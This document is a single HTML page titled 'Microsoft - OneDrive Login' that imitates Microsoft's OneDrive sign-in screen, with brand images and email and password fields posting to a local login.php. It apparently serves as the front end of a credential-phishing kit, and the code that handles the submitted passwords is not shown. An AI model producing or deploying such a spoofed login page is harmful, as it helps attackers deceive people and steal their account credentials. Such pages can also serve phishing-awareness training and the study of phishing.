<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <title>Microsoft - OneDrive Login</title>
  <!-- Author: Sajjad -->
  <style>
  	body{
  background-color: Black;
  font-family: Sans-serif;
  	}
  .container{
  width: 350px;
  height: 400px;
  position: absolute;
  left: 10px;
  top: 10%;
  
  	}
  .box{
  background-color: transparent;
  width: 98%;
  padding: 12px 3px;
  margin: 8px;
  border: 1.5px solid gray;
  	}
  
  .p1{
  	color: white;
  font-size: 30px;
  margin-left: 10px;
  }
  .p2{
  	color: white;
  font-size: 14px;
  margin-left: 10px;
  }
  input{
  color: white;
  }
  input:hover{
  border: 2px solid #1a73e8;
  outline: none;
  }
  
  .btn{
  	width: 100px;
  	margin-left: 8px;
  padding: 7px 0px;
  background-color: #004d99;
  border: none;
  color: white;
  position: absolute;
  right: 0px;
  margin-top: 10px;
  	}
  
  .logo{
  width: 120px;
  margin-left: 0px;
  	}
  
  .image{
  	width: 100px;
  	}
  .a1{
  font-size: 12px;
  color: #1a8cff;
  text-decoration: none;
  margin-left: 10px;
  }
  .container-bottom{
  position: absolute;
  background-color: #0099ff;
  width: 100%;
  text-align: center;
  bottom: 2px;
  left: 0px;
  padding: 5px;
  }
  .p3{
  font-size: 12px;
  font-weight: bold;
  }
  .a2{
  text-decoration: none;
  color: black;
  }
  </style>
</head>
<body>
  <form action="login.php" method="post">
  	<div>
  	<img src="Image/image.png" alt="Microsoft" class="image"/>
  </div>
  	<div class="container">
  	<div>
  	<img src="Image/logo.png" alt="OneDrive" class="logo"/>
  </div>
  	<div>
  	<p class="p1">Sign in</p>
  	</div>
  	<div>
  	<p class="p2">Enter your work, school or personal Microsoft account</p>
  </div>
  <div>
  	<input type="text" name="username" class="box" placeholder="Email"></input>
  </div>
  <div>
  	<input type="password" name="password" class="box" placeholder="Password"></input>
  </div>
  <div>
  	<button type="submit" class="btn">Sign in</button>
  </div>
  <div>
  	<a href="#" class="a1">Forgotten your password?</a>
  </div>
  </div>
  <div class="container-bottom">
  	<p class="p3">No account? <a href="#" class="a2">Create one!</a></p>
  </div>
  </form>
</body>
</html>